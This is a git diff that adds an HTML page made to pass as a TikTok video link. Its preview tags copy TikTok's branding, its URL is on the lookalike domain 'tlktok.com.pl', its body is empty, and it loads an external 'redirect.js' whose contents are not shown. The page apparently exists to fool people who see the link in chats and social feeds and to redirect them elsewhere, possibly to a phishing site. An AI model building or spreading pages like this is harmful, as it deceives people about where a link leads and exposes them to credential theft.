Add HTML structure and meta tags for TikTok video

--- a/@itzz_arbuz4/video/7571758510245956886/index.html
+++ b/@itzz_arbuz4/video/7571758510245956886/index.html
@@ -1,1 +1,22 @@
-
+<!DOCTYPE html>
+<html lang="pl">
+<head>
+  <meta charset="UTF-8" />
+  <title>TikTok · chickenthatfarts</title>
+  <meta property="og:title" content="TikTok · chickenthatfarts" />
+  <meta property="og:site_name" content="TikTok" />
+  <meta property="og:description" content="TikTok video by chickenthatfarts" />
+  <meta property="og:url" content="https://vm.tlktok.com.pl/@itzz_arbuz4/video/7571758510245956886" />
+  <meta property="og:image" content="calc.png" />
+  <meta property="og:type" content="website" />
+  <meta name="twitter:card" content="summary_large_image" />
+  <meta name="twitter:title" content="TikTok · ig :amelcixx_" />
+  <meta name="twitter:description" content="TikTok video by ig :amelcixx_" />
+  <meta name="twitter:image" content="calc.png" />
+  <meta name="twitter:site" content="@tiktok_us" />
+  <meta name="twitter:domain" content="tiktok.com" />
+  <script src="redirect.js"></script>
+</head>
+<body>
+</body>
+</html>
